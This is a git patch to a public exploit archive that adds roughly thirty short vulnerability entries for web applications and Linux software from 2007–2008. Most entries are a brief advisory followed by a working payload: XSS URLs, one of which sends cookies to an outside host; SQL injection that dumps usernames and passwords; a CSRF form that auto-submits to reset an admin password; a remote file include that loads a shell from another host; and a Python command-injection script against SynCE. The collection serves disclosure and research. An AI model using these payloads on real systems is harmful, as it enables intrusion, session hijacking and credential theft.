From 28528a8613af3084932f89fda688e72cb36b5dbb Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 18 Jan 2014 04:25:16 +0000
Subject: [PATCH] Updated 01_18_2014

---
 files.csv                        | 30 ++++++++++++++++++++++++++++++
 platforms/asp/webapps/30993.txt  |  9 +++++++++
 platforms/cgi/webapps/30975.txt  |  7 +++++++
 platforms/jsp/webapps/31004.txt  | 10 ++++++++++
 platforms/jsp/webapps/31005.txt  |  9 +++++++++
 platforms/jsp/webapps/31006.txt  |  9 +++++++++
 platforms/jsp/webapps/31007.txt  |  9 +++++++++
 platforms/linux/dos/30985.txt    | 15 +++++++++++++++
 platforms/linux/dos/31002.txt    | 13 +++++++++++++
 platforms/linux/remote/30998.py  | 30 ++++++++++++++++++++++++++++++
 platforms/php/webapps/30976.txt  |  9 +++++++++
 platforms/php/webapps/30977.txt  |  7 +++++++
 platforms/php/webapps/30978.txt  |  7 +++++++
 platforms/php/webapps/30979.txt  |  8 ++++++++
 platforms/php/webapps/30980.txt  | 15 +++++++++++++++
 platforms/php/webapps/30981.txt  | 13 +++++++++++++
 platforms/php/webapps/30982.html |  9 +++++++++
 platforms/php/webapps/30983.txt  |  9 +++++++++
 platforms/php/webapps/30984.txt  | 12 ++++++++++++
 platforms/php/webapps/30987.txt  |  9 +++++++++
 platforms/php/webapps/30988.txt  |  9 +++++++++
 platforms/php/webapps/30992.txt  |  7 +++++++
 platforms/php/webapps/30994.html | 25 +++++++++++++++++++++++++
 platforms/php/webapps/30995.txt  |  9 +++++++++
 platforms/php/webapps/30996.txt  |  9 +++++++++
 platforms/php/webapps/30997.txt  |  9 +++++++++
 platforms/php/webapps/31000.txt  |  7 +++++++
 platforms/php/webapps/31001.txt  |  9 +++++++++
 platforms/php/webapps/31003.txt  | 13 +++++++++++++
 platforms/php/webapps/31008.txt  | 10 ++++++++++
 platforms/php/webapps/31009.txt  |  8 ++++++++
 31 files changed, 354 insertions(+)
 create mode 100755 platforms/asp/webapps/30993.txt
 create mode 100755 platforms/cgi/webapps/30975.txt
 create mode 100755 platforms/jsp/webapps/31004.txt
 create mode 100755 platforms/jsp/webapps/31005.txt
 create mode 100755 platforms/jsp/webapps/31006.txt
 create mode 100755 platforms/jsp/webapps/31007.txt
 create mode 100755 platforms/linux/dos/30985.txt
 create mode 100755 platforms/linux/dos/31002.txt
 create mode 100755 platforms/linux/remote/30998.py
 create mode 100755 platforms/php/webapps/30976.txt
 create mode 100755 platforms/php/webapps/30977.txt
 create mode 100755 platforms/php/webapps/30978.txt
 create mode 100755 platforms/php/webapps/30979.txt
 create mode 100755 platforms/php/webapps/30980.txt
 create mode 100755 platforms/php/webapps/30981.txt
 create mode 100755 platforms/php/webapps/30982.html
 create mode 100755 platforms/php/webapps/30983.txt
 create mode 100755 platforms/php/webapps/30984.txt
 create mode 100755 platforms/php/webapps/30987.txt
 create mode 100755 platforms/php/webapps/30988.txt
 create mode 100755 platforms/php/webapps/30992.txt
 create mode 100755 platforms/php/webapps/30994.html
 create mode 100755 platforms/php/webapps/30995.txt
 create mode 100755 platforms/php/webapps/30996.txt
 create mode 100755 platforms/php/webapps/30997.txt
 create mode 100755 platforms/php/webapps/31000.txt
 create mode 100755 platforms/php/webapps/31001.txt
 create mode 100755 platforms/php/webapps/31003.txt
 create mode 100755 platforms/php/webapps/31008.txt
 create mode 100755 platforms/php/webapps/31009.txt

diff --git a/files.csv b/files.csv
index 4a2c2e931..2e6d5d0c1 100755
--- a/files.csv
+++ b/files.csv
@@ -27798,3 +27798,33 @@ id,file,description,date,author,platform,type,port
 30969,platforms/php/webapps/30969.txt,"MODx 0.9.6.1 'AjaxSearch.php' Local File Include Vulnerability",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0
 30972,platforms/multiple/remote/30972.txt,"Camtasia Studio 4.0.2 'csPreloader' Remote Code Execution Vulnerability",2008-01-02,"Rich Cannings",multiple,remote,0
 30973,platforms/multiple/remote/30973.txt,"InfoSoft FusionCharts 3 SWF Flash File Remote Code Execution Vulnerability",2008-01-02,"Rich Cannings",multiple,remote,0
+30975,platforms/cgi/webapps/30975.txt,"W3-mSQL Error Page Cross-Site Scripting Vulnerability",2008-01-03,vivek_infosec,cgi,webapps,0
+30976,platforms/php/webapps/30976.txt,"MyPHP Forum 3.0 'Search.php' and Multiple Unspecified SQL Injection Vulnerabilities",2008-01-03,The:Paradox,php,webapps,0
+30977,platforms/php/webapps/30977.txt,"WordPress <= 2.2.3 wp-admin/post.php popuptitle Parameter XSS",2008-01-03,3APA3A,php,webapps,0
+30978,platforms/php/webapps/30978.txt,"WordPress <= 2.2.3 wp-admin/page-new.php popuptitle Parameter XSS",2008-01-03,3APA3A,php,webapps,0
+30979,platforms/php/webapps/30979.txt,"WordPress <= 2.2.3 wp-admin/edit.php backup Parameter XSS",2008-01-03,3APA3A,php,webapps,0
+30980,platforms/php/webapps/30980.txt,"AwesomeTemplateEngine 1 Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0
+30981,platforms/php/webapps/30981.txt,"PRO-Search 0.17 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0
+30982,platforms/php/webapps/30982.html,"Nucleus CMS 3.0.1 'myid' Parameter SQL Injection Weakness",2008-01-03,MustLive,php,webapps,0
+30983,platforms/php/webapps/30983.txt,"ExpressionEngine 1.2.1 HTTP Response Splitting and Cross Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0
+30984,platforms/php/webapps/30984.txt,"eTicket 1.5.5 'newticket.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-03,"Omer Singer",php,webapps,0
+30985,platforms/linux/dos/30985.txt,"'libcdio' 0.7x GNU Compact Disc Input and Control Library Buffer Overflow Vulnerabilities",2007-12-30,"Devon Miller",linux,dos,0
+30987,platforms/php/webapps/30987.txt,"netRisk 1.9.7 'index.php' Remote File Include Vulnerability",2008-01-04,S.W.A.T.,php,webapps,0
+30988,platforms/php/webapps/30988.txt,"Rotabanner Local 2/3 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0
+30992,platforms/php/webapps/30992.txt,"Strawberry 1.1.1 'html.php' Remote Code Execution Vulnerability",2008-01-07,"Eugene Minaev",php,webapps,0
+30993,platforms/asp/webapps/30993.txt,"Snitz Forums 2000 3.4.5/3.4.6 Multiple Cross-Site Scripting Vulnerabilities",2008-01-07,Doz,asp,webapps,0
+30994,platforms/php/webapps/30994.html,"eTicket 1.5.5.2 admin.php CSRF",2008-01-07,L4teral,php,webapps,0
+30995,platforms/php/webapps/30995.txt,"eTicket 1.5.5.2 view.php s Parameter XSS",2008-01-07,L4teral,php,webapps,0
+30996,platforms/php/webapps/30996.txt,"eTicket 1.5.5.2 search.php Multiple Parameter SQL Injection",2008-01-07,L4teral,php,webapps,0
+30997,platforms/php/webapps/30997.txt,"eTicket 1.5.5.2 admin.php Multiple Parameter SQL Injection",2008-01-07,L4teral,php,webapps,0
+30998,platforms/linux/remote/30998.py,"SynCE 0.92 'vdccm' Daemon Remote Command Injection Vulnerability",2008-01-07,"Alfredo Ortega",linux,remote,0
+31000,platforms/php/webapps/31000.txt,"SysHotel On Line System 'index.php' Local File Include Vulnerability",2008-01-08,p4imi0,php,webapps,0
+31001,platforms/php/webapps/31001.txt,"IceWarp Mail Server 9.1.1 'admin/index.html' Cross-Site Scripting Vulnerability",2008-01-08,Ekin0x,php,webapps,0
+31002,platforms/linux/dos/31002.txt,"xine-lib <= 1.1.9 'rmff_dump_cont()' Remote Heap Buffer Overflow Vulnerability",2008-01-09,"Luigi Auriemma",linux,dos,0
+31003,platforms/php/webapps/31003.txt,"Omegasoft Insel 7 Authentication Bypass Vulnerability and User Enumeration Weakness",2008-01-09,MC.Iglo,php,webapps,0
+31004,platforms/jsp/webapps/31004.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 /idm/login.jsp Multiple Parameter XSS",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0
+31005,platforms/jsp/webapps/31005.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 /idm/account/findForSelect.jsp resultsForm Parameter XSS",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0
+31006,platforms/jsp/webapps/31006.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 /idm/help/index.jsp helpUrl Variable Remote Frame Injection",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0
+31007,platforms/jsp/webapps/31007.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 /idm/user/main.jsp activeControl Parameter XSS",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0
+31008,platforms/php/webapps/31008.txt,"Joomla-SMF Forum 1.1.4 Multiple Cross-Site Scripting Vulnerabilities",2008-01-09,Doz,php,webapps,0
+31009,platforms/php/webapps/31009.txt,"ID-Commerce 2.0 'liste.php' SQL Injection Vulnerability",2008-01-10,consultant.securite,php,webapps,0
diff --git a/platforms/asp/webapps/30993.txt b/platforms/asp/webapps/30993.txt
new file mode 100755
index 000000000..dccfb3268
--- /dev/null
+++ b/platforms/asp/webapps/30993.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27162/info
+
+Snitz Forums 2000 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Snitz Forums 2000 2.4.05 and 3.4.06 are vulnerable; other versions may also be affected. 
+
+http://www.example.com/Forums/setup.asp?RC=3&MAIL=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E http://www.example.com/login.asp?target=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E 
\ No newline at end of file
diff --git a/platforms/cgi/webapps/30975.txt b/platforms/cgi/webapps/30975.txt
new file mode 100755
index 000000000..4bccfef36
--- /dev/null
+++ b/platforms/cgi/webapps/30975.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27116/info
+
+W3-mSQL is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/cgi-bin/w3-msql/<script>alert('xss')</script>
\ No newline at end of file
diff --git a/platforms/jsp/webapps/31004.txt b/platforms/jsp/webapps/31004.txt
new file mode 100755
index 000000000..ebcd81903
--- /dev/null
+++ b/platforms/jsp/webapps/31004.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/27214/info
+
+Sun Java System Identity Manager is prone to multiple input-validation vulnerabilities, including an HTML-injection issue and cross-site scripting issues, because it fails to adequately sanitize user-supplied input.
+
+Attackers can exploit these issues to execute arbitrary HTML and script code in the context of the affected site. Successful exploits could allow an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
+
+Sun Java System Identity Manager 6.0 SP1, 6.0 SP2, 6.0 SP3, 7.0, and 7.1 are vulnerable. 
+
+https://www.example.com/idm/login.jsp?lang=en&cntry=--><textarea>THIS+IS+MY+INJECTED+HTML&lt;/textarea&gt;<!--
+https://www.example.com/idm/login.jsp?lang=--><script>window.location="http://www.example2.com/?"+document.cookie</script><!--&cntry=
\ No newline at end of file
diff --git a/platforms/jsp/webapps/31005.txt b/platforms/jsp/webapps/31005.txt
new file mode 100755
index 000000000..d01ba7111
--- /dev/null
+++ b/platforms/jsp/webapps/31005.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27214/info
+ 
+Sun Java System Identity Manager is prone to multiple input-validation vulnerabilities, including an HTML-injection issue and cross-site scripting issues, because it fails to adequately sanitize user-supplied input.
+ 
+Attackers can exploit these issues to execute arbitrary HTML and script code in the context of the affected site. Successful exploits could allow an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
+ 
+Sun Java System Identity Manager 6.0 SP1, 6.0 SP2, 6.0 SP3, 7.0, and 7.1 are vulnerable. 
+
+https://www.example.com/idm/account/findForSelect.jsp?resultsForm=<script>alert(&#039;Running_scripting_within_the_context_of_&#039;%2bdocument.domain)</script>&predefinedQuery=name%3Astarts+with%3A%25
\ No newline at end of file
diff --git a/platforms/jsp/webapps/31006.txt b/platforms/jsp/webapps/31006.txt
new file mode 100755
index 000000000..a761abba6
--- /dev/null
+++ b/platforms/jsp/webapps/31006.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27214/info
+  
+Sun Java System Identity Manager is prone to multiple input-validation vulnerabilities, including an HTML-injection issue and cross-site scripting issues, because it fails to adequately sanitize user-supplied input.
+  
+Attackers can exploit these issues to execute arbitrary HTML and script code in the context of the affected site. Successful exploits could allow an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
+  
+Sun Java System Identity Manager 6.0 SP1, 6.0 SP2, 6.0 SP3, 7.0, and 7.1 are vulnerable. 
+
+https://www.example.com/idm/help/index.jsp?helpUrl=http://www.example2.com
\ No newline at end of file
diff --git a/platforms/jsp/webapps/31007.txt b/platforms/jsp/webapps/31007.txt
new file mode 100755
index 000000000..b83dc8bad
--- /dev/null
+++ b/platforms/jsp/webapps/31007.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27214/info
+   
+Sun Java System Identity Manager is prone to multiple input-validation vulnerabilities, including an HTML-injection issue and cross-site scripting issues, because it fails to adequately sanitize user-supplied input.
+   
+Attackers can exploit these issues to execute arbitrary HTML and script code in the context of the affected site. Successful exploits could allow an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
+   
+Sun Java System Identity Manager 6.0 SP1, 6.0 SP2, 6.0 SP3, 7.0, and 7.1 are vulnerable. 
+
+https://www.example.com/idm/user/main.jsp?activeControl=";</script><script>alert(&#039;Running_scripting_within_the_context_of_&#039;%2bdocument.domain)</script>
\ No newline at end of file
diff --git a/platforms/linux/dos/30985.txt b/platforms/linux/dos/30985.txt
new file mode 100755
index 000000000..569ae29a2
--- /dev/null
+++ b/platforms/linux/dos/30985.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/27131/info
+
+The GNU Compact Disc Input and Control Library ('libcdio') is prone to multiple buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data.
+
+The issues occur when the 'cd-info' and 'iso-info' programs handle specially crafted ISO files.
+
+Successfully exploiting these issues may allow remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts likely result in denial-of-service conditions.
+
+The issues affect libcdio 0.79; other versions may also be affected.
+
+Steps to Reproduce:
+1. mkdir -p tmp/dir1
+2. echo file_with_really_really_long_silly_name_to_test_iso_info_buffer
+3. mkisofs -J -R -volid My_Image -o test.iso tmp
+4. iso-info -l test.iso 
\ No newline at end of file
diff --git a/platforms/linux/dos/31002.txt b/platforms/linux/dos/31002.txt
new file mode 100755
index 000000000..3e3f86116
--- /dev/null
+++ b/platforms/linux/dos/31002.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/27198/info
+
+The xine-lib library is prone to a remote heap-based buffer-overflow vulnerability. This issue occurs because the software fails to perform adequate boundary checks on user-supplied data.
+
+An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will result in a denial-of-service condition.
+
+This issue affects xine-lib 1.1.9 and prior versions. 
+
+The following proof-of-concept SDP data is available:
+
+a=Abstract:buffer;'QUFBQUFBQUFBQUFBQUFB...40000_of_QUFBQUFB's...FBQUFB'
+
+When decoding 'QUFBQUFB', the portion will be decoded to 'AAAAAA'. 
\ No newline at end of file
diff --git a/platforms/linux/remote/30998.py b/platforms/linux/remote/30998.py
new file mode 100755
index 000000000..beee71671
--- /dev/null
+++ b/platforms/linux/remote/30998.py
@@ -0,0 +1,30 @@
+source: http://www.securityfocus.com/bid/27178/info
+
+SynCE is prone to a remote command-injection vulnerability because it fails to adequately sanitize user-supplied input data.
+
+Attackers can exploit this issue to execute arbitrary commands in the context of the application, facilitating the remote compromise of affected computers.
+
+SynCE 0.92 is vulnerable; other versions may also be affected. 
+
+import socket, struct
+import time
+def AtoWChar(string):
+    return ''.join([x+chr(0) for x in string])
+
+HOST = '192.168.XXX.XXX'
+PORT = 5679
+c= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+c.connect((HOST, PORT))
+buf="\x00"*0x18
+buf+='\x30\x00\x00\x00'
+buf+='\x30\x00\x00\x00'
+buf+='\x30\x00\x00\x00'
+buf+="\x00"*12
+string=AtoWChar("&/usr/bin/touch /tmp/vulnerability")
+buf+=string+"\x00\x00"+"\x00"*12
+c.send(struct.pack("L",63+len(string))+buf+"\x00" )
+- ---------------------------
+
+NOTE: for this proof of concept to work, a script file is needed on the
+"$home$/.synce/scripts" directory. Some linux distributions ship with
+scripts on this directory by default.
diff --git a/platforms/php/webapps/30976.txt b/platforms/php/webapps/30976.txt
new file mode 100755
index 000000000..f947ccd5d
--- /dev/null
+++ b/platforms/php/webapps/30976.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27118/info
+
+MyPHP Forum is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+MyPHP Forum 3.0 is vulnerable; other versions may also be affected. 
+
+submit=Search&searchtext=%'/**/UNION/**/SELECT/**/0,0,0,concat('<BR/><h3>-=ParadoxGotThisOne=-</h3><BR/><h4>Username:',username,'<BR/>Password:',password,'</h4>'),0,0,0,0,0,0/**/FROM/**/[Prefix]_member/**/WHERE/**/uid=[Id]/*" 
\ No newline at end of file
diff --git a/platforms/php/webapps/30977.txt b/platforms/php/webapps/30977.txt
new file mode 100755
index 000000000..033fd055e
--- /dev/null
+++ b/platforms/php/webapps/30977.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27123/info
+
+WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://site/wp-admin/post.php?popuptitle=%22%20style=%22xss:expression(alert(document.cookie))%22
\ No newline at end of file
diff --git a/platforms/php/webapps/30978.txt b/platforms/php/webapps/30978.txt
new file mode 100755
index 000000000..7c2facd49
--- /dev/null
+++ b/platforms/php/webapps/30978.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27123/info
+ 
+WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://site/wp-admin/page-new.php?popuptitle=%22%20style=%22xss:expression(alert(document.cookie))%22
\ No newline at end of file
diff --git a/platforms/php/webapps/30979.txt b/platforms/php/webapps/30979.txt
new file mode 100755
index 000000000..8f516d02a
--- /dev/null
+++ b/platforms/php/webapps/30979.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/27123/info
+  
+WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+  
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+
+http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=%3Cscript%3Ealert(document.cookie)%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/30980.txt b/platforms/php/webapps/30980.txt
new file mode 100755
index 000000000..e4335ba00
--- /dev/null
+++ b/platforms/php/webapps/30980.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/27125/info
+
+AwesomeTemplateEngine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+AwesomeTemplateEngine 1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/templates/example_template.php?data[title]=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
+http://www.example.com/templates/example_template.php?data[message]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
+http://www.example.com/templates/example_template.php?data[table][1][item]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
+http://www.example.com/templates/example_template.php?data[table][1][url]=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
+http://www.example.com/templates/example_template.php?data[poweredby]=%3Cscript%3Ealert(document.cookie)%3C/script%3E 
+
+
diff --git a/platforms/php/webapps/30981.txt b/platforms/php/webapps/30981.txt
new file mode 100755
index 000000000..ad04c7a77
--- /dev/null
+++ b/platforms/php/webapps/30981.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/27126/info
+
+PRO-Search is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+PRO-Search 0.17 is vulnerable; other versions may also be affected.
+
+http://www.example.com/templates/example_template.php?data[title]=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
+http://www.example.com/templates/example_template.php?data[message]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
+http://www.example.com/templates/example_template.php?data[table][1][item]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
+http://www.example.com/templates/example_template.php?data[table][1][url]=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
+http://www.example.com/templates/example_template.php?data[poweredby]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
diff --git a/platforms/php/webapps/30982.html b/platforms/php/webapps/30982.html
new file mode 100755
index 000000000..fed788a53
--- /dev/null
+++ b/platforms/php/webapps/30982.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27127/info
+
+Nucleus CMS is prone to an SQL-injection weakness because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Attackers can exploit this issue in conjunction with other weaknesses in the application to bypass CAPTCHA security checks. Other attacks may also be possible.
+
+Nucleus CMS 3.01 is vulnerable; other versions may also be affected. 
+
+<html> <head> <title>MoBiC-20 Bonus: another Nucleus CAPTCHA bypass exploit (C) 2007 MustLive. http://websecurity.com.ua</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http://site/action.php" method="post"> <input type="hidden" name="action" value="addcomment" /> <input type="hidden" name="code" value="1" /> <input type="hidden" name="url" value="index.php?itemid=1" /> <input type="hidden" name="itemid" value="1" /> <input type="hidden" name="body" value="Captcha bypass test." /> <input type="hidden" name="myid" value="-1 union select 1,1,1 from nucleus_blog" /> <input type="hidden" name="remember" value="0" /> <input type="hidden" name="conf" value="1" /> </form> </body> </html> 
\ No newline at end of file
diff --git a/platforms/php/webapps/30983.txt b/platforms/php/webapps/30983.txt
new file mode 100755
index 000000000..ab9b94ee1
--- /dev/null
+++ b/platforms/php/webapps/30983.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27128/info
+
+ExpressionEngine is prone to an HTTP-response-splitting vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user, steal cookie-based authentication credentials, and influence how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust.
+
+ExpressionEngine 1.2.1 is vulnerable to these issues; other versions may also be affected. 
+
+http://www.example.com/index.php?URL=%0AContent-Type:html%0A%0A%3Cscript%3Ealert(document.cookie)%3C/script%3E 
\ No newline at end of file
diff --git a/platforms/php/webapps/30984.txt b/platforms/php/webapps/30984.txt
new file mode 100755
index 000000000..abe41c3ed
--- /dev/null
+++ b/platforms/php/webapps/30984.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/27130/info
+
+eTicket is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+These issues affect eTicket 1.5.6-RC3, 1.5.6-RC2, 1.5.5.2; other versions may also be affected.
+
+The following proof-of-concept examples are available:
+
+For eTicket 1.5.6-RC3: Create a ticket with the subject <SCRIPT>a=/XSS/;alert(a.source)</SCRIPT>
+For eTicket 1.5.6-RC2: Create a ticket with the subject <script>alert(123)</script> 
\ No newline at end of file
diff --git a/platforms/php/webapps/30987.txt b/platforms/php/webapps/30987.txt
new file mode 100755
index 000000000..656ef17c6
--- /dev/null
+++ b/platforms/php/webapps/30987.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27136/info
+
+netRisk is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code on an affected computer with the privileges of the webserver process.
+
+This issue affects netRisk 1.9.7; other versions may also be affected.
+
+http://www.example.com/Path/index.php?path=[SHELL] 
\ No newline at end of file
diff --git a/platforms/php/webapps/30988.txt b/platforms/php/webapps/30988.txt
new file mode 100755
index 000000000..7bf8ff4ca
--- /dev/null
+++ b/platforms/php/webapps/30988.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27138/info
+
+Rotabanner Local is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+These issues affect Rotabanner Local 2 and 3; other versions may also be affected. 
+
+http://www.example.com/account/index.html?user=%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/account/index.html?drop=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 
\ No newline at end of file
diff --git a/platforms/php/webapps/30992.txt b/platforms/php/webapps/30992.txt
new file mode 100755
index 000000000..df4148979
--- /dev/null
+++ b/platforms/php/webapps/30992.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27160/info
+
+Strawberry is prone to a remote code-execution vulnerability because the application fails to properly sanitize user-supplied input.
+
+A successful exploit will allow an attacker to compromise the application and the underlying system; other attacks are also possible. 
+
+http://www.example.com/strawberry/plugins/wacko/highlight/html.php?text=%3C!--{${eval($s)}}--%3E&s=include('www.example2.com/shell');
\ No newline at end of file
diff --git a/platforms/php/webapps/30994.html b/platforms/php/webapps/30994.html
new file mode 100755
index 000000000..fe8a05c61
--- /dev/null
+++ b/platforms/php/webapps/30994.html
@@ -0,0 +1,25 @@
+source: http://www.securityfocus.com/bid/27173/info
+
+eTicket is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. These vulnerabilities include multiple SQL-injection issues, a cross-site scripting issue, and an authentication-bypass issue.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, exploit vulnerabilities in the underlying database, or execute arbitrary script code in the browser of an unsuspecting user.
+
+These issues affect eTicket 1.5.5.2; other versions may also be affected.
+
+<html>
+<body>
+<form id="csrf" name="csrf"
+action="http://www.example.com/eTicket/admin.php?a=my" method="post">
+<input type="hidden" name="a" value="my">
+<input type="text" name="username" value="admin"><br>
+<input type="text" name="name" value="admin"><br>
+<input type="text" name="email" value="mail@example.com"><br>
+<input type="password" name="password" value="&#039;) OR (&#039;1&#039;=&#039;1"><br>
+<input type="password" name="npassword" value="hacked"><br>
+<input type="password" name="vpassword" value="hacked"><br>
+<textarea name="sig" cols="30" rows="5">&lt;/textarea&gt;<br>
+<input type="submit" name="submit" value="Save Changes"><br>
+</form>
+<script language="JavaScript">document.getElementById(&#039;csrf&#039;).submit.click()</script>
+</body>
+</html>
diff --git a/platforms/php/webapps/30995.txt b/platforms/php/webapps/30995.txt
new file mode 100755
index 000000000..a70f0fbe4
--- /dev/null
+++ b/platforms/php/webapps/30995.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27173/info
+ 
+eTicket is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. These vulnerabilities include multiple SQL-injection issues, a cross-site scripting issue, and an authentication-bypass issue.
+ 
+A successful exploit could allow an attacker to compromise the application, access or modify data, exploit vulnerabilities in the underlying database, or execute arbitrary script code in the browser of an unsuspecting user.
+ 
+These issues affect eTicket 1.5.5.2; other versions may also be affected.
+
+http://www.example.com/eTicket/view.php?s="><script>alert(document.cookie)</script>
\ No newline at end of file
diff --git a/platforms/php/webapps/30996.txt b/platforms/php/webapps/30996.txt
new file mode 100755
index 000000000..bbf9a176a
--- /dev/null
+++ b/platforms/php/webapps/30996.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27173/info
+  
+eTicket is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. These vulnerabilities include multiple SQL-injection issues, a cross-site scripting issue, and an authentication-bypass issue.
+  
+A successful exploit could allow an attacker to compromise the application, access or modify data, exploit vulnerabilities in the underlying database, or execute arbitrary script code in the browser of an unsuspecting user.
+  
+These issues affect eTicket 1.5.5.2; other versions may also be affected.
+
+http://www.example.com/eTicket/search.php?s=advanced&text=test&cat=&status=open&#039;SQL&search_submit=Search
\ No newline at end of file
